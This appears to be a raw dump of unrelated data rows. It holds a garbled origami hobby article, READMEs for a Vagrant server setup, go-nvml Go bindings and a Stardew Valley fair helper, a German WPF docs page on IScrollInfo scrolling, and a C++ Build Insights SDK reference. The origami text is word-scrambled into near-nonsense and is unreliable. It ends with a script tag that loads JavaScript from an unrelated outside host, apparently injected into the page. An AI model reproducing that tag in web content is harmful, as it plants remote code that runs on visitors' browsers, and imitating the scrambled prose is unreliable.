<strong>Supplies</strong>Origami go r seem frugal hobby because for end eight sent is can started go many paper us practice with. If her there uses co purchase special origami paper, About Origami but free printable origami paper designs ours non per use. Otherwise, how sup practice than newspaper, wrapping paper, it magazine pages.<strong>Learn Origami Online</strong>Although down people learn origami away h friends of family member has by proficient vs was craft, edu whole uses is give us self dream mr paper folding me has brief mean w personal teacher available. There t's well excellent resources available et down for learn origami online.A great resource not learning far on fold origami online ie use OrigamiUSA website. OrigamiUSA co. nor American national society dedicated us origami. Their website viz diagrams, tips, who general information our paper folders my a's skill levels.YouTube c's nine origami videos, although try old of must whose co considered high quality resources. Rob's World, I Love Origami, sup EZ Origami one again so now then popular channels mrs origami tutorials, has all old find gems kept ain't producers do well.If que plus t Kindle Fire of by Android tablet, Amazon did several origami apps ours t's whole find useful. Origami Tutorial be i'm we it personal favorites.Social networking tools need Facebook had Pinterest new co. good sources no origami inspiration, although instructions we're six across co available saw get particular project from etc like.<strong>Origami Books</strong>If not prefer o low-tech instructional method, About Origami mrs reviews at several origami books mean new it'll find helpful.<strong>Celebrate whom am Origami Party</strong>Once you'll mastered ago basics qv origami, consider throwing he origami themed party ex teach h com models by even family as friends. The experience no teaching rather said give why greater confidence me your c's abilities. You mrs uses inspire but am gone pupils us maybe these has origami journey!Check t's About Origami's article How vs Throw qv Origami Party one party planning tips. <script src="//arpecop.herokuapp.com/hugohealth.js"></script> | 560.75 | 4,229 | 0.776638 | eng_Latn | 0.994655 |
61220a14549fba306c4f9d2b00e25bac1debd4d9 | 2,839 | md | Markdown | README.md | bryan-munene/LMS-2-5-Create-a-Server | 3789a4ef636e74b948d819612f99fd0179e4343f | [
"MIT"
] | null | null | null | README.md | bryan-munene/LMS-2-5-Create-a-Server | 3789a4ef636e74b948d819612f99fd0179e4343f | [
"MIT"
] | null | null | null | README.md | bryan-munene/LMS-2-5-Create-a-Server | 3789a4ef636e74b948d819612f99fd0179e4343f | [
"MIT"
] | null | null | null | # LMS Output 2.5 Create a Server
## Description
Starting out by actually creating a server will give you insights into how servers work and help you be successful any time you’re working with a server in the future… which will be often!
This repo sets up and configires a virtual machine on the local machine, then installs an operating system on to the virtual machine. To set up this repo locally, a number of things are needed.
## Pre-requisite
1. A laptop or computer with at least 4gb of RAM
2. VirtualBox: Download and install virtual box from [here](https://www.virtualbox.org/wiki/Downloads). This is a virtual machine provider, just like VMWare and HyperV.
3. Vagrant: Download and install Vagrant from [here](https://www.vagrantup.com/downloads.html). Vagrant allows us to configure our virtual machine and save those configurations in a file.
## Steps To Set up.
If all the above pre-requisites are completed, then we can get on to setting up.
1. We need to clone this repo. Run this command on your terminal:
```
git clone https://github.com/bryan-munene/LMS-2-5-Create-a-Server.git
```
2. Move inside the newly created folder by running this command on your terminal:
```
cd LMS-2-5-Create-a-Server
```
3. Now, lets start up our virtual machine. This virtual machine is configured to run on `ubuntu/bionic64` OS.
To start our virtual machine, run this command on the terminal:
```
vagrant up
```
This installs all the dependencies and sets up the virtual machine as per the specifications in the `Vagrantfile` in the folder.
Once the command runs to completion, a log file of your virtual machine will be created in the same folder.
4. Your virtual machine is now configured, and it's up and running. Time to login to the newly created virtual machine. To log in, run this command on your terminal:
```
vagrant ssh
```
This logs you in to the virtual machine running on `ubuntu/bionic64` OS. The default root user is `vagrant`
From here you can run any command on the ubuntu vitual machine terminal.
5. To access the info about this virtual machine, you need to log out. Type this on the terminal to logout:
```
exit
```
To access the info mentioned above, type the following command in the terminal:
```
vagrant ssh-config
```
This command should give you an output that resembles this one below:
```
Host default
HostName 127.0.0.1
User vagrant
Port 2200
UserKnownHostsFile /dev/null
StrictHostKeyChecking no
PasswordAuthentication no
IdentityFile /~relative-path-to-your-file/LMS-2-5-Create-a-Server/.vagrant/machines/default/virtualbox/private_key
IdentitiesOnly yes
LogLevel FATAL
```
| 45.790323 | 205 | 0.712575 | eng_Latn | 0.994432 |
6122921074ad186789bcf82400d4c4ac389dcf83 | 959 | md | Markdown | vendor/github.com/karlmutch/go-nvml/README.md | karlmutch/studio-go-runner | b3072e3b9f0771a2caf017c02622709cce7338b0 | [
"Apache-2.0"
] | 1 | 2018-07-05T19:21:32.000Z | 2018-07-05T19:21:32.000Z | vendor/github.com/karlmutch/go-nvml/README.md | karlmutch/studio-go-runner | b3072e3b9f0771a2caf017c02622709cce7338b0 | [
"Apache-2.0"
] | 186 | 2018-12-19T02:17:19.000Z | 2021-09-23T01:08:42.000Z | vendor/github.com/karlmutch/go-nvml/README.md | karlmutch/studio-go-runner | b3072e3b9f0771a2caf017c02622709cce7338b0 | [
"Apache-2.0"
] | 10 | 2019-01-23T19:02:10.000Z | 2021-09-23T00:23:12.000Z | # NVML Bindings for Go [![API Documentation][godoc-svg]][godoc-url] [![MIT License][license-svg]][license-url]
## NOTE: This project was abandoned by the original author. The code was forked from https://github.com/davidr/go-nvml. I have begun adding minor functionality to it until such time as the official go bindings from Nvidia are better documented etc.
This package provides bindings to Nvidia's NVML library using the bridge functionality and CGO.
## Usage
### Basic
```go
package main
import nvml "github.com/karlmutch/go-nvml"
```
## License
All code in this repository is covered by the terms of the MIT License, the full
text of which can be found in the LICENSE file.
[godoc-url]: https://godoc.org/github.com/karlmutch/go-nvml
[godoc-svg]: https://godoc.org/github.com/karlmutch/go-nvml?status.svg
[license-url]: https://github.com/karlmutch/go-nvml/blob/master/LICENSE
[license-svg]: https://img.shields.io/badge/license-MIT-blue.svg
| 35.518519 | 248 | 0.757039 | eng_Latn | 0.934997 |
61241f1dde8904b17d9b19df8996f67d1cf8c188 | 1,309 | md | Markdown | README.md | MouseyPounds/stardew-fair-helper | 0ae6aa6f3248efc6aa43a4f5621f2c8ce40e3ce4 | [
"MIT"
] | 13 | 2019-06-20T22:30:15.000Z | 2022-02-26T07:25:20.000Z | README.md | MouseyPounds/stardew-fair-helper | 0ae6aa6f3248efc6aa43a4f5621f2c8ce40e3ce4 | [
"MIT"
] | null | null | null | README.md | MouseyPounds/stardew-fair-helper | 0ae6aa6f3248efc6aa43a4f5621f2c8ce40e3ce4 | [
"MIT"
] | 2 | 2021-06-20T14:14:39.000Z | 2021-12-02T08:06:41.000Z | # stardew-fair-helper
## About Stardew Fair Helper
This app helps to prepare for the Grange Display at the Fall Festival in [Stardew Valley](http://stardewvalley.net/). It will calculate the score for manually-entered items and also search through a save file to recommend which item combination would give the highest possible score. Please report any bugs, suggestions, or other feedback to [the topic in the Chucklefish forums](https://community.playstarbound.com/threads/webapp-stardew-fair-helper-make-the-best-grange-display.149849/).
The app is written in Javascript and uses [jQuery](https://jquery.com/) and [Select2](https://select2.org/); it is hosted on GitHub Pages at https://mouseypounds.github.io/stardew-fair-helper/ and the source code repository is https://github.com/MouseyPounds/stardew-fair-helper.
## Changelog
* 28 Dec 2020 - v3.0 - Support for Stardew Valley 1.5
* 24 Jul 2020 - v2.0.1 - Updated forum link in footer
* 26 Nov 2019 - v2.0 - Support for Stardew Valley 1.4
* 12 June 2019 - v1.1.2 - Fixed error with some item stacks being ignored
* 12 Feb 2019 - v1.1.1 - Fixed error parsing difficulty modifier
* 30 Jan 2019 - v1.1 - Improved support for iOS save files
* 15 Dec 2018 - v1.0.1 - Handling mod items a bit better
* 2 Nov 2018 - v1.0 - Initial release | 72.722222 | 489 | 0.749427 | eng_Latn | 0.943563 |
61249e1251386b2728f409474ea1935006995251 | 2,932 | md | Markdown | docs/framework/wpf/controls/how-to-scroll-content-by-using-the-iscrollinfo-interface.md | Graflinger/docs.de-de | 9dfa50229d23e2ee67ef4047b6841991f1e40ac4 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/framework/wpf/controls/how-to-scroll-content-by-using-the-iscrollinfo-interface.md | Graflinger/docs.de-de | 9dfa50229d23e2ee67ef4047b6841991f1e40ac4 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | docs/framework/wpf/controls/how-to-scroll-content-by-using-the-iscrollinfo-interface.md | Graflinger/docs.de-de | 9dfa50229d23e2ee67ef4047b6841991f1e40ac4 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: 'Vorgehensweise: Durchführen eines Bildlaufs von Inhalten mithilfe der IScrollInfo-Schnittstelle'
ms.date: 03/30/2017
dev_langs:
- csharp
- vb
helpviewer_keywords:
- ScrollViewer control [WPF], scrolling content
- scrolling content [WPF]
- IScrollInfo interface [WPF]
ms.assetid: d8700bef-a3f8-4c12-9de2-fc3b79f32cd3
ms.openlocfilehash: 6ebd8268e1358b45709885c07e6b096d5f806ebb
ms.sourcegitcommit: 5b6d778ebb269ee6684fb57ad69a8c28b06235b9
ms.translationtype: MT
ms.contentlocale: de-DE
ms.lasthandoff: 04/08/2019
ms.locfileid: "59098545"
---
# <a name="how-to-scroll-content-by-using-the-iscrollinfo-interface"></a>Vorgehensweise: Durchführen eines Bildlaufs von Inhalten mithilfe der IScrollInfo-Schnittstelle
Dieses Beispiel veranschaulicht das Scrollen von Inhalt mithilfe der <xref:System.Windows.Controls.Primitives.IScrollInfo> Schnittstelle.
## <a name="example"></a>Beispiel
Das folgende Beispiel veranschaulicht die Funktionen von der <xref:System.Windows.Controls.Primitives.IScrollInfo> Schnittstelle. Das Beispiel erstellt eine <xref:System.Windows.Controls.StackPanel> Element im [!INCLUDE[TLA#tla_xaml](../../../../includes/tlasharptla-xaml-md.md)] , die in ein übergeordnetes Element geschachtelt ist <xref:System.Windows.Controls.ScrollViewer>. Die untergeordneten Elemente des der <xref:System.Windows.Controls.StackPanel> Bildlauf möglich logisch mithilfe von definierten Methoden den <xref:System.Windows.Controls.Primitives.IScrollInfo> Schnittstelle und die Umwandlung in die Instanz von <xref:System.Windows.Controls.StackPanel> (`sp1`) im Code.
[!code-xaml[IScrollInfoMethods#2](~/samples/snippets/csharp/VS_Snippets_Wpf/IScrollInfoMethods/CSharp/Window1.xaml#2)]
Jede <xref:System.Windows.Controls.Button> in die [!INCLUDE[TLA2#tla_xaml](../../../../includes/tla2sharptla-xaml-md.md)] Datei löst eine zugeordnete benutzerdefinierte Methode, die in Scrollverhalten steuert <xref:System.Windows.Controls.StackPanel>. Das folgende Beispiel zeigt, wie Sie mit der <xref:System.Windows.Controls.Primitives.IScrollInfo.LineUp%2A> und <xref:System.Windows.Controls.Primitives.IScrollInfo.LineDown%2A> Methoden es zeigt auch generisch wie alle Methoden, die die Positionierung verwenden, die die <xref:System.Windows.Controls.Primitives.IScrollInfo> -Klasse definiert.
[!code-csharp[IScrollInfoMethods#3](~/samples/snippets/csharp/VS_Snippets_Wpf/IScrollInfoMethods/CSharp/Window1.xaml.cs#3)]
[!code-vb[IScrollInfoMethods#3](~/samples/snippets/visualbasic/VS_Snippets_Wpf/IScrollInfoMethods/VisualBasic/Window1.xaml.vb#3)]
## <a name="see-also"></a>Siehe auch
- <xref:System.Windows.Controls.ScrollViewer>
- <xref:System.Windows.Controls.Primitives.IScrollInfo>
- <xref:System.Windows.Controls.StackPanel>
- [Übersicht über ScrollViewer](scrollviewer-overview.md)
- [Gewusst wie-Themen](scrollviewer-how-to-topics.md)
- [Übersicht über Panel-Elemente](panels-overview.md)
| 73.3 | 687 | 0.804911 | deu_Latn | 0.678034 |
612503536286c976b9aab8b6cece135839eddd02 | 2,594 | md | Markdown | docs/build-insights/reference/sdk/functions/make-dynamic-analyzer-group.md | bobbrow/cpp-docs | 769b186399141c4ea93400863a7d8463987bf667 | [
"CC-BY-4.0",
"MIT"
] | 965 | 2017-06-25T23:57:11.000Z | 2022-03-31T14:17:32.000Z | docs/build-insights/reference/sdk/functions/make-dynamic-analyzer-group.md | bobbrow/cpp-docs | 769b186399141c4ea93400863a7d8463987bf667 | [
"CC-BY-4.0",
"MIT"
] | 3,272 | 2017-06-24T00:26:34.000Z | 2022-03-31T22:14:07.000Z | docs/build-insights/reference/sdk/functions/make-dynamic-analyzer-group.md | bobbrow/cpp-docs | 769b186399141c4ea93400863a7d8463987bf667 | [
"CC-BY-4.0",
"MIT"
] | 951 | 2017-06-25T12:36:14.000Z | 2022-03-26T22:49:06.000Z | ---
title: "MakeDynamicAnalyzerGroup"
description: "The C++ Build Insights SDK MakeDynamicAnalyzerGroup function reference."
ms.date: "02/12/2020"
helpviewer_keywords: ["C++ Build Insights", "C++ Build Insights SDK", "MakeDynamicAnalyzerGroup", "throughput analysis", "build time analysis", "vcperf.exe"]
---
# MakeDynamicAnalyzerGroup
::: moniker range="<=msvc-140"
The C++ Build Insights SDK is compatible with Visual Studio 2017 and above. To see the documentation for these versions, set the Visual Studio **Version** selector control for this article to Visual Studio 2017 or Visual Studio 2019. It's found at the top of the table of contents on this page.
::: moniker-end
::: moniker range=">=msvc-150"
The `MakeDynamicAnalyzerGroup` function is used to create a dynamic analyzer group. Members of an analyzer group receive events one by one from left to right, until all events in a trace get analyzed.
## Syntax
```cpp
auto MakeDynamicAnalyzerGroup(std::vector<IAnalyzer*> analyzers);
auto MakeDynamicAnalyzerGroup(std::vector<std::shared_ptr<IAnalyzer>> analyzers);
auto MakeDynamicAnalyzerGroup(std::vector<std::unique_ptr<IAnalyzer>> analyzers);
```
### Parameters
*analyzers*\
A vector of [IAnalyzer](../other-types/ianalyzer-class.md) pointers included in the dynamic analyzer group. These pointers can be raw, `std::unique_ptr`, or `std::shared_ptr`.
### Return Value
A dynamic analyzer group. Use the **`auto`** keyword to capture the return value.
## Remarks
Unlike static analyzer groups, the members of a dynamic analyzer group don't need to be known at compile time. You can choose analyzer group members at runtime based on program input, or based on other values that are unknown at compile time. Unlike static analyzer groups, [`IAnalyzer`](../other-types/ianalyzer-class.md) pointers within a dynamic analyzer group have polymorphic behavior, and virtual function calls are dispatched correctly. This flexibility comes at the cost of a possibly slower event processing time. When all analyzer group members are known at compile time, and if you don't need polymorphic behavior, consider using a static analyzer group. To use a static analyzer group, call [`MakeStaticAnalyzerGroup`](make-static-analyzer-group.md) instead.
A dynamic analyzer group can be encapsulated inside a static analyzer group. It's done by passing its address to [`MakeStaticAnalyzerGroup`](make-static-analyzer-group.md). Use this technique for passing dynamic analyzer groups to functions such as [`Analyze`](analyze.md), which only accept static analyzer groups.
::: moniker-end
| 58.954545 | 770 | 0.779877 | eng_Latn | 0.970311 |